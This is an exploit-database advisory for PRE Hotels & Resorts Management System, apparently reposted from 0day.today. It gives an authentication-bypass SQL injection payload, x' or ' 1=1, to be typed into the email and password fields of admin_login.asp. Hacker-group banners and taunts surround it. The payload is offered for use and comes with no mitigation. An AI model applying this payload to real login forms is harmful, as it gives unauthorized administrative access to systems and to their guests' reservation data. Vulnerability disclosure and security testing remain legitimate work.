id: 12336
date: 05/22/2010
title: Hotel and Resort Reservation Portal (Auth Bypass) SQL Injection
author: R3d-D3v!L
cves: 

=============================================================================
Hotel and Resort Reservation Portal (Auth Bypass) SQL Injection Vulnerability 
=============================================================================


[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~] Vendor: www.preproject.com
[*] Software:PRE HOTELS & RESORTS MANAGEMENT SYSTEM
[*] author: ((R3d-D3v!L))
[*] Date: 17.dec.2009
[*] T!ME: 3:03 am
[?] Home: WwW.xP10.ME
[?] contact: N/A
[?]
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
 
 
 
[*] Exploit:
 
[?] E-/\/\A!L : x' or ' 1=1
 
[?] password : x' or ' 1=1
 
http://server/[path]/admin_login.asp
 
N073:
 
REAL RED DEV!L W@S h3r3 LAMERZ
 
GAZA !N our hearts !



#  0day.today [2023-03-26]  #